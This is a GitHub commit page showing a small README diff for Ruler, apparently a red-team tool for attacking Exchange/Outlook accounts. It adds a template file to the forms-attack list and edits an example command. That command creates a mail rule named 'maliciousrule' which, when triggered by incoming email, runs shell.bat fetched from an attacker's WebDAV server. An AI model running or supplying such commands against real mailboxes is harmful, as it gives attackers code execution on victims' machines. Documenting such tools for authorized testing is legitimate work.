Skip to content

Commit

Permalink
add formsdeletemplate.bin to the README
Browse files Browse the repository at this point in the history
  • Loading branch information
Etienne Stalmans committed May 4, 2017
1 parent 4207f3e commit 600a4bf
Showing 1 changed file with 2 additions and 1 deletion.
3 changes: 2 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -238,7 +238,7 @@ go run webdavserv.go -d /path/to/directory/to/serve
To create the new rule user Ruler and:

```
./ruler --email user@targetdomain.com --username username add --location "\\\\yourserver\\webdav\\shell.bat" --trigger "pop a shell" --name maliciousrule
./ruler --email user@targetdomain.com --username username add --location "\\\\yourserver\\webdav\\shell.bat" --trigger "popashell" --name maliciousrule
```

The various parts:
Expand Down Expand Up @@ -319,6 +319,7 @@ If you use the forms attack, you need to ensure that the **templates** folder is
* img0.bin
* img1.bin
* formstemplate.bin
* formsdeletetemplate.bin

## Using forms

Expand Down

0 comments on commit 600a4bf

Please sign in to comment.